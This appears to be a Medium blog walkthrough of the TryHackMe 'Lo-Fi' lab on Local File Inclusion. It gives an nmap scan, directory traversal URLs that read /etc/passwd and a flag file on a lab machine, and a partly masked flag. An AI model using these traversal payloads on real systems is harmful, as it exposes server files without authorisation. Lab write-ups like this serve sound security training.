Open in app

Sign in

Write

Sign in

Learn Lo-Fi — TryHackMe Walkthrough

NIkhil Kumar
2 min readJan 18, 2025

Challenge Name: Lo-Fi
Difficulty: Easy
Estimated Time: 35 minutes

Introduction

This challenge focuses on Local File Inclusion (LFI), a vulnerability that allows an attacker to read files on the target server. The goal is to locate and retrieve the flag stored in the root filesystem.

Steps to Complete the Challenge

Step 1: Deploy the Machines

  1. Start the vulnerable machine by clicking the green Start Machine button in the task.
  2. Launch the AttackBox by pressing the Start AttackBox button at the top-right corner of the page.
  3. Once the machines are running, note the target machine’s IP address (e.g., 10.10.50.96).

Step 2: Reconnaissance

  1. Open a terminal in the AttackBox.
  2. Perform a port scan using nmap to identify open ports on the target machine:
nmap -sC -sV 10.10.50.96
  1. Results:
  • Port 22 (SSH)
  • Port 80 (HTTP)

Step 3: Explore the Web Application

  1. Navigate to the web application using the browser:
http://10.10.50.96
  1. Review the webpage content and structure for potential vulnerabilities. No interactive features are immediately apparent, so test for common vulnerabilities such as LFI.

Step 4: Test for LFI

  1. Identify a parameter in the URL, such as ?page=.
  2. Test basic directory traversal payloads to confirm LFI:
http://10.10.50.96/?page=/etc/passwd
http://10.10.50.96/?page=../../../etc/passwd
  1. Expected Output: Contents of the /etc/passwd file, confirming LFI is present.

Step 5: Locate the Flag

  1. Use the LFI vulnerability to access the flag file. Try paths leading to the root directory:
http://10.10.50.96/?page=../../../flag.txt
http://10.10.50.96/index.php?page=../../../flag.txt
  1. Output: The page displays the flag:
flag{e4478e0eab69bd642b8238765dcb7***}

Step 6: Submit the Flag

  1. Copy the retrieved flag.
  2. Submit the flag in the task prompt to complete the challenge.

Key Takeaways

  • LFI Basics: Local File Inclusion vulnerabilities can often be exploited by crafting malicious file paths to access sensitive files on the server.
  • Reconnaissance: Always begin with a port scan and analyze the web application’s behavior.
  • Payload Crafting: Iteratively test directory traversal techniques to reach the target file.

Room Resources

Sign up to discover human stories that deepen your understanding of the world.

Local File Inclusion
Hacking
Tryhackme Walkthrough
Cybersecurity
Web Application Security

NIkhil Kumar
NIkhil Kumar

Written by NIkhil Kumar

5 Followers
1 Following

Cybersecurity enthusiast with skills in penetration testing, vulnerability assessment, and Python. Passionate about strengthening security protocols

No responses yet

Write a response

What are your thoughts?

More from NIkhil Kumar

See all from NIkhil Kumar

Recommended from Medium

Lists

Spell AI Automation
An image by the author.
iPhone displaying the new intelligent Siri

Tech & Tools

23 stories409 saves

Medium's Huge List of Publications Accepting Submissions

414 stories4678 saves

Staff picks

827 stories1648 saves
Robot hand touching human hand

Natural Language Processing

1977 stories1620 saves
See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams